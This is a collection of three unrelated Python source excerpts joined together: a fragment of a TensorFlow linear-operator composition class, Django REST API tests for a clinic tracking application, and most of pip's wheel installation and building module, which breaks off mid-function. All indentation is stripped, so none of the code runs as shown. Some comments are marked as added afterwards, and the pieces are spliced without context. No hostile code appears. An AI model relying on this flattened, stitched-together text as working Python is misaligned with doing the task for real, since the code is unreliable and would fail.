if name is None:
name = "_o_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorComposition, self).__init__(
dtype=dtype,
graph_parents=graph_parents,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
name=name)
@property
def operators(self):
return self._operators
def _shape(self):
# Get final matrix shape.
domain_dimension = self.operators[0].domain_dimension
for operator in self.operators[1:]:
domain_dimension.assert_is_compatible_with(operator.range_dimension)
domain_dimension = operator.domain_dimension
matrix_shape = tensor_shape.TensorShape(
[self.operators[0].range_dimension,
self.operators[-1].domain_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if self.shape.is_fully_defined():
return ops.convert_to_tensor(
self.shape.as_list(), dtype=dtypes.int32, name="shape")
# Don't check the matrix dimensions. That would add unnecessary Asserts to
# the graph. Things will fail at runtime naturally if shapes are
# incompatible.
matrix_shape = array_ops.stack([
self.operators[0].range_dimension_tensor(),
self.operators[-1].domain_dimension_tensor()
])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
# If self.operators = [A, B], and not adjoint, then
# matmul_order_list = [B, A].
# As a result, we return A.matmul(B.matmul(x))
if adjoint:
matmul_order_list = self.operators
else:
matmul_order_list = list(reversed(self.operators))
result = matmul_order_list[0].matmul(
x, adjoint=adjoint, adjoint_arg=adjoint_arg)
for operator in matmul_order_list[1:]:
result = operator.matmul(result, adjoint=adjoint)
return result
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
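  # Note (descriptive comment added for clarity): for square operators,
  # det(A1 A2 ... AJ) = det(A1) * det(A2) * ... * det(AJ), which is why
  # _determinant() multiplies and _log_abs_determinant() sums the values of
  # the constituent operators.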
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
# TODO(langmore) Implement solve using solve_ls if some intermediate
# operator maps to a high dimensional space.
# In that case, an exact solve may still be possible.
# If self.operators = [A, B], and not adjoint, then
# solve_order_list = [A, B].
# As a result, we return B.solve(A.solve(x))
if adjoint:
solve_order_list = list(reversed(self.operators))
else:
solve_order_list = self.operators
solution = solve_order_list[0].solve(
rhs, adjoint=adjoint, adjoint_arg=adjoint_arg)
for operator in solve_order_list[1:]:
solution = operator.solve(solution, adjoint=adjoint)
return solution
def _add_to_tensor(self, x):
return self.to_dense() + x
|
|
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth.models import User
from tracking.models import Organization, Clinic, ClinicUser, \
ReferringEntity, ReferringReportSetting, ClinicReportSetting
class LoginBaseTest(APITestCase):
''' a base class for rest testcases which need login '''
def setUp(self):
        '''initialise the default user to log in with'''
self.default_pass = 'pass1234'
self.user = User.objects.create_superuser(username='user1',
email='user1@email.com',
password=self.default_pass)
self.clinic = Clinic.objects.create(clinic_name="clinic1")
self.clinic_user = ClinicUser.objects.create(
clinic=self.clinic,
user=self.user)
def _login(self):
''' do login on client '''
return self.client.login(username=self.user.username,
password=self.default_pass)
class OrganizationTest(LoginBaseTest):
''' testcases class for Organization Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:organization-list')
data = {'org_name': 'org1', 'clinic': self.clinic.id}
self.assertEqual(Organization.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Organization.objects.count(), 1)
self.assertEqual(Organization.objects.get().org_name, 'org1')
def test_add_not_authorized(self):
''' call add api while not authorized '''
url = reverse('rest_api:organization-list')
data = {'org_name': 'org1', 'clinic': self.clinic.id}
self.assertEqual(Organization.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(Organization.objects.count(), 0)
def test_get(self):
''' get api test '''
self._login()
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['org_name'], 'org1')
def test_get_not_authorized(self):
''' call get api while not authorized '''
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update(self):
''' update api test '''
self._login()
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
data = {'org_name': 'org2'}
response = self.client.patch(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Organization.objects.count(), 1)
org1 = Organization.objects.get(id=org1.id)
self.assertEqual(org1.org_name, 'org2')
def test_update_not_authorized(self):
''' call update api while not authorized '''
org1 = Organization.objects.create(org_name='org1', clinic=self.clinic)
url = reverse('rest_api:organization-detail', args=(org1.id,))
data = {'org_name': 'org2'}
response = self.client.patch(url, data)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list(self):
''' list api test '''
orgs = [Organization.objects.create(org_name='org{0}'.format(i),
clinic=self.clinic)
for i in range(5)]
self._login()
url = reverse('rest_api:organization-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
results = response.data['results']
self.assertEqual(len(results), len(orgs))
def test_list_not_authorized(self):
''' call list api while not authorized '''
url = reverse('rest_api:organization-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class ReferringReportSettingTest(LoginBaseTest):
    ''' testcases class for ReferringReportSetting Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
referring_entity = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id)
data = {'enabled': True,
'period': ReferringReportSetting.PERIOD_DAILY,
'report_name': 'thankyou',
'referring_entity': referring_entity.id}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(ReferringReportSetting.objects.count(), 1)
rs = ReferringReportSetting.objects.get()
self.assertEqual(rs.enabled, True)
self.assertEqual(rs.period, ReferringReportSetting.PERIOD_DAILY)
self.assertEqual(rs.report_name, 'thankyou')
self.assertEqual(rs.referring_entity, referring_entity)
def test_add_invalid(self):
        ''' add api with invalid period test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
referring_entity = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id)
data = {'enabled': True,
'period': 'Invalid',
'report_name': 'thankyou',
'referring_entity': referring_entity.id}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_add_bulk(self):
        ''' bulk add api test '''
self._login()
url = reverse('rest_api:referringreportsetting-list')
organization = Organization.objects.create(
org_name='org1',
clinic_id=self.clinic.id)
ref1 = ReferringEntity.objects.create(
entity_name='phys1', organization_id=organization.id,
clinic_id=self.clinic.id)
ref2 = ReferringEntity.objects.create(
entity_name='phys2', organization_id=organization.id,
clinic_id=self.clinic.id)
data = {'enabled': True,
'period': ReferringReportSetting.PERIOD_DAILY,
'report_name': 'thankyou',
'referring_entity': '*',
'bulk': True}
self.assertEqual(ReferringReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(ReferringReportSetting.objects.count(), 2)
rs = ReferringReportSetting.objects.all()
self.assertSetEqual({r.referring_entity.id for r in rs},
{ref1.id, ref2.id})
class ClinicReportSettingTest(LoginBaseTest):
    ''' testcases class for ClinicReportSetting Rest api '''
def test_add(self):
''' add api test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
data = {'enabled': True,
'period': ClinicReportSetting.PERIOD_DAILY,
'report_name': 'visit_history',
'clinic_user': self.clinic_user.id}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(ClinicReportSetting.objects.count(), 1)
rs = ClinicReportSetting.objects.get()
self.assertEqual(rs.enabled, True)
self.assertEqual(rs.period, ClinicReportSetting.PERIOD_DAILY)
self.assertEqual(rs.report_name, 'visit_history')
self.assertEqual(rs.clinic_user, self.clinic_user)
def test_add_invalid(self):
        ''' add api with invalid period test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
data = {'enabled': True,
'period': 'Invalid',
'report_name': 'visit_history',
'clinic_user': self.clinic_user.id}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_add_bulk(self):
        ''' bulk add api test '''
self._login()
url = reverse('rest_api:clinicreportsetting-list')
user2 = User.objects.create_user(username='user2',
email='user1@email.com',
password=self.default_pass)
clinic_user2 = ClinicUser.objects.create(
clinic=self.clinic,
user=user2)
data = {'enabled': True,
'period': ClinicReportSetting.PERIOD_DAILY,
'report_name': 'visit_history',
'clinic_user': '*',
'bulk': True}
self.assertEqual(ClinicReportSetting.objects.count(), 0)
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(ClinicReportSetting.objects.count(), 2)
rs = ClinicReportSetting.objects.all()
self.assertSetEqual({r.clinic_user.id for r in rs},
{self.clinic_user.id, clinic_user2.id})
|
|
"""
Support for installing and building the "wheel" binary package format.
"""
from __future__ import absolute_import
import collections
import compileall
import csv
import hashlib
import logging
import os.path
import re
import shutil
import stat
import sys
import warnings
from base64 import urlsafe_b64encode
from email.parser import Parser
from pip._vendor import pkg_resources
from pip._vendor.distlib.scripts import ScriptMaker
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.six import StringIO
from pip._internal import pep425tags
from pip._internal.download import path_to_url, unpack_url
from pip._internal.exceptions import (
InstallationError, InvalidWheelFilename, UnsupportedWheel,
)
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, distutils_scheme,
)
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
call_subprocess, captured_stdout, ensure_dir, read_chunks,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.ui import open_spinner
if MYPY_CHECK_RUNNING:
from typing import Dict, List, Optional # noqa: F401
wheel_ext = '.whl'
VERSION_COMPATIBLE = (1, 0)
logger = logging.getLogger(__name__)
def rehash(path, blocksize=1 << 20):
"""Return (hash, length) for path using hashlib.sha256()"""
h = hashlib.sha256()
length = 0
with open(path, 'rb') as f:
for block in read_chunks(f, size=blocksize):
length += len(block)
h.update(block)
digest = 'sha256=' + urlsafe_b64encode(
h.digest()
).decode('latin1').rstrip('=')
return (digest, length)
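# Note (descriptive comment added for clarity): the digest format above follows
# the wheel RECORD convention (PEP 376/427): "sha256=" followed by the urlsafe
# base64 digest with the trailing "=" padding stripped, so the (digest, length)
# pair can be written directly into a RECORD row for the rewritten file.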
def open_for_csv(name, mode):
if sys.version_info[0] < 3:
nl = {}
bin = 'b'
else:
nl = {'newline': ''}
bin = ''
return open(name, mode + bin, **nl)
def fix_script(path):
"""Replace #!python with #!/path/to/python
Return True if file was changed."""
# XXX RECORD hashes will need to be updated
if os.path.isfile(path):
with open(path, 'rb') as script:
firstline = script.readline()
if not firstline.startswith(b'#!python'):
return False
exename = sys.executable.encode(sys.getfilesystemencoding())
firstline = b'#!' + exename + os.linesep.encode("ascii")
rest = script.read()
with open(path, 'wb') as script:
script.write(firstline)
script.write(rest)
return True
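# Illustrative example (not from the original source): a script whose first
# line starts with b'#!python' is rewritten so that it begins with
# b'#!' + sys.executable (for example '#!/usr/bin/python3'), and the rest of
# the file is written back unchanged; other files are left untouched.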
dist_info_re = re.compile(r"""^(?P<namever>(?P<name>.+?)(-(?P<ver>.+?))?)
\.dist-info$""", re.VERBOSE)
def root_is_purelib(name, wheeldir):
"""
Return True if the extracted wheel in wheeldir should go into purelib.
"""
name_folded = name.replace("-", "_")
for item in os.listdir(wheeldir):
match = dist_info_re.match(item)
if match and match.group('name') == name_folded:
with open(os.path.join(wheeldir, item, 'WHEEL')) as wheel:
for line in wheel:
line = line.lower().rstrip()
if line == "root-is-purelib: true":
return True
return False
def get_entrypoints(filename):
if not os.path.exists(filename):
return {}, {}
# This is done because you can pass a string to entry_points wrappers which
# means that they may or may not be valid INI files. The attempt here is to
# strip leading and trailing whitespace in order to make them valid INI
# files.
with open(filename) as fp:
data = StringIO()
for line in fp:
data.write(line.strip())
data.write("\n")
data.seek(0)
# get the entry points and then the script names
entry_points = pkg_resources.EntryPoint.parse_map(data)
console = entry_points.get('console_scripts', {})
gui = entry_points.get('gui_scripts', {})
def _split_ep(s):
"""get the string representation of EntryPoint, remove space and split
on '='"""
return str(s).replace(" ", "").split("=")
# convert the EntryPoint objects into strings with module:function
console = dict(_split_ep(v) for v in console.values())
gui = dict(_split_ep(v) for v in gui.values())
return console, gui
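# Illustrative example (not from the original source): an entry_points.txt of
#     [console_scripts]
#     pip = pip._internal:main
# would yield ({'pip': 'pip._internal:main'}, {}), i.e. script names mapped to
# "module:function" strings for the console and gui sections respectively.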
def message_about_scripts_not_on_PATH(scripts):
# type: (List[str]) -> Optional[str]
"""Determine if any scripts are not on PATH and format a warning.
Returns a warning message if one or more scripts are not on PATH,
otherwise None.
"""
if not scripts:
return None
# Group scripts by the path they were installed in
grouped_by_dir = collections.defaultdict(set) # type: Dict[str, set]
for destfile in scripts:
parent_dir = os.path.dirname(destfile)
script_name = os.path.basename(destfile)
grouped_by_dir[parent_dir].add(script_name)
# We don't want to warn for directories that are on PATH.
not_warn_dirs = [
os.path.normcase(i).rstrip(os.sep) for i in
os.environ["PATH"].split(os.pathsep)
]
# If an executable sits with sys.executable, we don't warn for it.
# This covers the case of venv invocations without activating the venv.
not_warn_dirs.append(os.path.normcase(os.path.dirname(sys.executable)))
warn_for = {
parent_dir: scripts for parent_dir, scripts in grouped_by_dir.items()
if os.path.normcase(parent_dir) not in not_warn_dirs
}
if not warn_for:
return None
# Format a message
msg_lines = []
for parent_dir, scripts in warn_for.items():
scripts = sorted(scripts)
if len(scripts) == 1:
start_text = "script {} is".format(scripts[0])
else:
start_text = "scripts {} are".format(
", ".join(scripts[:-1]) + " and " + scripts[-1]
)
msg_lines.append(
"The {} installed in '{}' which is not on PATH."
.format(start_text, parent_dir)
)
last_line_fmt = (
"Consider adding {} to PATH or, if you prefer "
"to suppress this warning, use --no-warn-script-location."
)
if len(msg_lines) == 1:
msg_lines.append(last_line_fmt.format("this directory"))
else:
msg_lines.append(last_line_fmt.format("these directories"))
# Returns the formatted multiline message
return "\n".join(msg_lines)
def move_wheel_files(name, req, wheeldir, user=False, home=None, root=None,
pycompile=True, scheme=None, isolated=False, prefix=None,
warn_script_location=True):
"""Install a wheel"""
if not scheme:
scheme = distutils_scheme(
name, user=user, home=home, root=root, isolated=isolated,
prefix=prefix,
)
if root_is_purelib(name, wheeldir):
lib_dir = scheme['purelib']
else:
lib_dir = scheme['platlib']
info_dir = []
data_dirs = []
source = wheeldir.rstrip(os.path.sep) + os.path.sep
# Record details of the files moved
# installed = files copied from the wheel to the destination
# changed = files changed while installing (scripts #! line typically)
# generated = files newly generated during the install (script wrappers)
installed = {}
changed = set()
generated = []
# Compile all of the pyc files that we're going to be installing
if pycompile:
with captured_stdout() as stdout:
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
compileall.compile_dir(source, force=True, quiet=True)
logger.debug(stdout.getvalue())
def normpath(src, p):
return os.path.relpath(src, p).replace(os.path.sep, '/')
def record_installed(srcfile, destfile, modified=False):
"""Map archive RECORD paths to installation RECORD paths."""
oldpath = normpath(srcfile, wheeldir)
newpath = normpath(destfile, lib_dir)
installed[oldpath] = newpath
if modified:
changed.add(destfile)
def clobber(source, dest, is_base, fixer=None, filter=None):
ensure_dir(dest) # common for the 'include' path
for dir, subdirs, files in os.walk(source):
basedir = dir[len(source):].lstrip(os.path.sep)
destdir = os.path.join(dest, basedir)
if is_base and basedir.split(os.path.sep, 1)[0].endswith('.data'):
continue
for s in subdirs:
destsubdir = os.path.join(dest, basedir, s)
if is_base and basedir == '' and destsubdir.endswith('.data'):
data_dirs.append(s)
continue
elif (is_base and
s.endswith('.dist-info') and
canonicalize_name(s).startswith(
canonicalize_name(req.name))):
assert not info_dir, ('Multiple .dist-info directories: ' +
destsubdir + ', ' +
', '.join(info_dir))
info_dir.append(destsubdir)
for f in files:
# Skip unwanted files
if filter and filter(f):
continue
srcfile = os.path.join(dir, f)
destfile = os.path.join(dest, basedir, f)
# directory creation is lazy and after the file filtering above
# to ensure we don't install empty dirs; empty dirs can't be
# uninstalled.
ensure_dir(destdir)
# copyfile (called below) truncates the destination if it
# exists and then writes the new contents. This is fine in most
# cases, but can cause a segfault if pip has loaded a shared
# object (e.g. from pyopenssl through its vendored urllib3)
# Since the shared object is mmap'd an attempt to call a
# symbol in it will then cause a segfault. Unlinking the file
# allows writing of new contents while allowing the process to
# continue to use the old copy.
if os.path.exists(destfile):
os.unlink(destfile)
# We use copyfile (not move, copy, or copy2) to be extra sure
# that we are not moving directories over (copyfile fails for
# directories) as well as to ensure that we are not copying
# over any metadata because we want more control over what
# metadata we actually copy over.
shutil.copyfile(srcfile, destfile)
# Copy over the metadata for the file, currently this only
# includes the atime and mtime.
st = os.stat(srcfile)
if hasattr(os, "utime"):
os.utime(destfile, (st.st_atime, st.st_mtime))
# If our file is executable, then make our destination file
# executable.
if os.access(srcfile, os.X_OK):
st = os.stat(srcfile)
permissions = (
st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
)
os.chmod(destfile, permissions)
changed = False
if fixer:
changed = fixer(destfile)
record_installed(srcfile, destfile, changed)
clobber(source, lib_dir, True)
assert info_dir, "%s .dist-info directory not found" % req
# Get the defined entry points
ep_file = os.path.join(info_dir[0], 'entry_points.txt')
console, gui = get_entrypoints(ep_file)
def is_entrypoint_wrapper(name):
# EP, EP.exe and EP-script.py are scripts generated for
# entry point EP by setuptools
if name.lower().endswith('.exe'):
matchname = name[:-4]
elif name.lower().endswith('-script.py'):
matchname = name[:-10]
elif name.lower().endswith(".pya"):
matchname = name[:-4]
else:
matchname = name
# Ignore setuptools-generated scripts
return (matchname in console or matchname in gui)
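    # For example, for a console entry point named "foo", setuptools-generated
    # wrappers such as "foo", "foo.exe", "foo-script.py" or "foo.pya" all map
    # back to matchname "foo" and are therefore filtered out below.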
for datadir in data_dirs:
fixer = None
filter = None
for subdir in os.listdir(os.path.join(wheeldir, datadir)):
fixer = None
if subdir == 'scripts':
fixer = fix_script
filter = is_entrypoint_wrapper
source = os.path.join(wheeldir, datadir, subdir)
dest = scheme[subdir]
clobber(source, dest, False, fixer=fixer, filter=filter)
maker = ScriptMaker(None, scheme['scripts'])
# Ensure old scripts are overwritten.
# See https://github.com/pypa/pip/issues/1800
maker.clobber = True
# Ensure we don't generate any variants for scripts because this is almost
# never what somebody wants.
# See https://bitbucket.org/pypa/distlib/issue/35/
maker.variants = {''}
# This is required because otherwise distlib creates scripts that are not
# executable.
# See https://bitbucket.org/pypa/distlib/issue/32/
maker.set_mode = True
# Simplify the script and fix the fact that the default script swallows
# every single stack trace.
# See https://bitbucket.org/pypa/distlib/issue/34/
# See https://bitbucket.org/pypa/distlib/issue/33/
def _get_script_text(entry):
if entry.suffix is None:
raise InstallationError(
"Invalid script entry point: %s for req: %s - A callable "
"suffix is required. Cf https://packaging.python.org/en/"
"latest/distributing.html#console-scripts for more "
"information." % (entry, req)
)
return maker.script_template % {
"module": entry.prefix,
"import_name": entry.suffix.split(".")[0],
"func": entry.suffix,
}
maker._get_script_text = _get_script_text
maker.script_template = r"""# -*- coding: utf-8 -*-
import re
import sys
from %(module)s import %(import_name)s
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(%(func)s())
"""
# Special case pip and setuptools to generate versioned wrappers
#
# The issue is that some projects (specifically, pip and setuptools) use
# code in setup.py to create "versioned" entry points - pip2.7 on Python
# 2.7, pip3.3 on Python 3.3, etc. But these entry points are baked into
# the wheel metadata at build time, and so if the wheel is installed with
# a *different* version of Python the entry points will be wrong. The
# correct fix for this is to enhance the metadata to be able to describe
# such versioned entry points, but that won't happen till Metadata 2.0 is
# available.
# In the meantime, projects using versioned entry points will either have
# incorrect versioned entry points, or they will not be able to distribute
# "universal" wheels (i.e., they will need a wheel per Python version).
#
# Because setuptools and pip are bundled with _ensurepip and virtualenv,
# we need to use universal wheels. So, as a stopgap until Metadata 2.0, we
# override the versioned entry points in the wheel and generate the
# correct ones. This code is purely a short-term measure until Metadata 2.0
# is available.
#
# To add the level of hack in this section of code, in order to support
# ensurepip this code will look for an ``ENSUREPIP_OPTIONS`` environment
# variable which will control which version scripts get installed.
#
# ENSUREPIP_OPTIONS=altinstall
# - Only pipX.Y and easy_install-X.Y will be generated and installed
# ENSUREPIP_OPTIONS=install
# - pipX.Y, pipX, easy_install-X.Y will be generated and installed. Note
# that this option is technically if ENSUREPIP_OPTIONS is set and is
# not altinstall
# DEFAULT
# - The default behavior is to install pip, pipX, pipX.Y, easy_install
# and easy_install-X.Y.
pip_script = console.pop('pip', None)
if pip_script:
if "ENSUREPIP_OPTIONS" not in os.environ:
spec = 'pip = ' + pip_script
generated.extend(maker.make(spec))
if os.environ.get("ENSUREPIP_OPTIONS", "") != "altinstall":
spec = 'pip%s = %s' % (sys.version[:1], pip_script)
generated.extend(maker.make(spec))
spec = 'pip%s = %s' % (sys.version[:3], pip_script)
generated.extend(maker.make(spec))
# Delete any other versioned pip entry points
pip_ep = [k for k in console if re.match(r'pip(\d(\.\d)?)?$', k)]
for k in pip_ep:
del console[k]
easy_install_script = console.pop('easy_install', None)
if easy_install_script:
if "ENSUREPIP_OPTIONS" not in os.environ:
spec = 'easy_install = ' + easy_install_script
generated.extend(maker.make(spec))
spec = 'easy_install-%s = %s' % (sys.version[:3], easy_install_script)
generated.extend(maker.make(spec))
# Delete any other versioned easy_install entry points
easy_install_ep = [
k for k in console if re.match(r'easy_install(-\d\.\d)?$', k)
]
for k in easy_install_ep:
del console[k]
# Generate the console and GUI entry points specified in the wheel
if len(console) > 0:
generated_console_scripts = maker.make_multiple(
['%s = %s' % kv for kv in console.items()]
)
generated.extend(generated_console_scripts)
if warn_script_location:
msg = message_about_scripts_not_on_PATH(generated_console_scripts)
if msg is not None:
            logger.warning(msg)
if len(gui) > 0:
generated.extend(
maker.make_multiple(
['%s = %s' % kv for kv in gui.items()],
{'gui': True}
)
)
# Record pip as the installer
installer = os.path.join(info_dir[0], 'INSTALLER')
temp_installer = os.path.join(info_dir[0], 'INSTALLER.pip')
with open(temp_installer, 'wb') as installer_file:
installer_file.write(b'pip\n')
shutil.move(temp_installer, installer)
generated.append(installer)
# Record details of all files installed
record = os.path.join(info_dir[0], 'RECORD')
temp_record = os.path.join(info_dir[0], 'RECORD.pip')
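    # Each RECORD row is (path, hash, size). Files whose contents changed during
    # installation (e.g. rewritten script shebangs) and files generated here
    # (script wrappers, INSTALLER) get freshly computed hashes via rehash() below.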
with open_for_csv(record, 'r') as record_in:
with open_for_csv(temp_record, 'w+') as record_out:
reader = csv.reader(record_in)
writer = csv.writer(record_out)
for row in reader:
row[0] = installed.pop(row[0], row[0])
if row[0] in changed:
row[1], row[2] = rehash(row[0])
writer.writerow(row)
for f in generated:
h, l = rehash(f)
writer.writerow((normpath(f, lib_dir), h, l))
for f in installed:
writer.writerow((installed[f], '', ''))
shutil.move(temp_record, record)
def wheel_version(source_dir):
"""
Return the Wheel-Version of an extracted wheel, if possible.
Otherwise, return False if we couldn't parse / extract it.
"""
try:
dist = [d for d in pkg_resources.find_on_path(None, source_dir)][0]
wheel_data = dist.get_metadata('WHEEL')
wheel_data = Parser().parsestr(wheel_data)
version = wheel_data['Wheel-Version'].strip()
version = tuple(map(int, version.split('.')))
return version
except:
return False
def check_compatibility(version, name):
"""
Raises errors or warns if called with an incompatible Wheel-Version.
Pip should refuse to install a Wheel-Version that's a major series
    ahead of what it's compatible with (e.g. 2.0 > 1.1); and warn when
    installing a version only a minor version ahead (e.g. 1.2 > 1.1).
version: a 2-tuple representing a Wheel-Version (Major, Minor)
name: name of wheel or package to raise exception about
:raises UnsupportedWheel: when an incompatible Wheel-Version is given
"""
if not version:
raise UnsupportedWheel(
"%s is in an unsupported or invalid wheel" % name
)
if version[0] > VERSION_COMPATIBLE[0]:
raise UnsupportedWheel(
"%s's Wheel-Version (%s) is not compatible with this version "
"of pip" % (name, '.'.join(map(str, version)))
)
elif version > VERSION_COMPATIBLE:
logger.warning(
'Installing from a newer Wheel-Version (%s)',
'.'.join(map(str, version)),
)
class Wheel(object):
"""A wheel file"""
# TODO: maybe move the install code into this class
wheel_file_re = re.compile(
r"""^(?P<namever>(?P<name>.+?)-(?P<ver>.*?))
((-(?P<build>\d[^-]*?))?-(?P<pyver>.+?)-(?P<abi>.+?)-(?P<plat>.+?)
\.whl|\.dist-info)$""",
re.VERBOSE
)
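    # For example, "pip-10.0.1-py2.py3-none-any.whl" parses as name="pip",
    # ver="10.0.1", pyver="py2.py3", abi="none", plat="any" (no build tag);
    # underscores in the name and version are normalised to dashes below.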
def __init__(self, filename):
"""
:raises InvalidWheelFilename: when the filename is invalid for a wheel
"""
wheel_info = self.wheel_file_re.match(filename)
if not wheel_info:
raise InvalidWheelFilename(
"%s is not a valid wheel filename." % filename
)
self.filename = filename
self.name = wheel_info.group('name').replace('_', '-')
# we'll assume "_" means "-" due to wheel naming scheme
# (https://github.com/pypa/pip/issues/1150)
self.version = wheel_info.group('ver').replace('_', '-')
self.build_tag = wheel_info.group('build')
self.pyversions = wheel_info.group('pyver').split('.')
self.abis = wheel_info.group('abi').split('.')
self.plats = wheel_info.group('plat').split('.')
# All the tag combinations from this file
self.file_tags = {
(x, y, z) for x in self.pyversions
for y in self.abis for z in self.plats
}
def support_index_min(self, tags=None):
"""
Return the lowest index that one of the wheel's file_tag combinations
achieves in the supported_tags list e.g. if there are 8 supported tags,
        and one of the file tags is first in the list, then return 0. Returns
        None if the wheel is not supported.
"""
if tags is None: # for mock
tags = pep425tags.get_supported()
indexes = [tags.index(c) for c in self.file_tags if c in tags]
return min(indexes) if indexes else None
def supported(self, tags=None):
"""Is this wheel supported on this system?"""
if tags is None: # for mock
tags = pep425tags.get_supported()
return bool(set(tags).intersection(self.file_tags))
class WheelBuilder(object):
"""Build wheels from a RequirementSet."""
def __init__(self, finder, preparer, wheel_cache,
build_options=None, global_options=None, no_clean=False):
self.finder = finder
self.preparer = preparer
self.wheel_cache = wheel_cache
self._wheel_dir = preparer.wheel_download_dir
self.build_options = build_options or []
self.global_options = global_options or []
self.no_clean = no_clean
def _build_one(self, req, output_dir, python_tag=None):
"""Build one wheel.
:return: The filename of the built wheel, or None if the build failed.
"""
# Install build deps into temporary directory (PEP 518)
with req.build_env:
return self._build_one_inside_env(req, output_dir,
python_tag=python_tag)
def _build_one_inside_env(self, req, output_dir, python_tag=None):
with TempDirectory(kind="wheel") as temp_dir:
if self.__build_one(req, temp_dir.path, python_tag=python_tag):
try:
wheel_name = os.listdir(temp_dir.path)[0]
wheel_path = os.path.join(output_dir, wheel_name)
shutil.move(
os.path.join(temp_dir.path, wheel_name), wheel_path
)
logger.info('Stored in directory: %s', output_dir)
return wheel_path
except:
pass
# Ignore return, we can't do anything else useful.
self._clean_one(req)
return None
def _base_setup_args(self, req):
        # NOTE: Eventually, we'd want to also add -S to the flags here, when we're
# isolating. Currently, it breaks Python in virtualenvs, because it
# relies on site.py to find parts of the standard library outside the
# virtualenv.
return [
sys.executable, '-u', '-c',
SETUPTOOLS_SHIM % req.setup_py
] + list(self.global_options)
def __build_one(self, req, tempd, python_tag=None):
base_args = self._base_setup_args(req)
spin_message = 'Running setup.py bdist_wheel for %s' % (req.name,)
with open_spinner(spin_message) as spinner:
logger.debug('Destination directory: %s', tempd)
wheel_args = base_args + ['bdist_wheel', '-d', tempd] \
+ self.build_options
if python_tag is not None:
wheel_args += ["--python-tag", python_tag]
try:
call_subprocess(wheel_args, cwd=req.setup_py_dir,
show_stdout=False, spinner=spinner)
return True
except:
spinner.finish("error")
logger.error('Failed building wheel for %s', req.name)
return False
def _clean_one(self, req):
base_args = self._base_setup_args(req)
logger.info('Running setup.py clean for %s', req.name)
clean_args = base_args + ['clean', '--all']
try:
call_subprocess(clean_args, cwd=req.source_dir, show_stdout=False)
return True
except:
logger.error('Failed cleaning build dir for %s', req.name)
return False
def build(self, requirements, session, autobuilding=False):
"""Build wheels.
        :param autobuilding: If True, build wheels implicitly into the wheel
            cache rather than into an explicitly requested wheel directory.
:return: True if all the wheels built correctly.
"""
from pip._internal import index
building_is_possible = self._wheel_dir or (
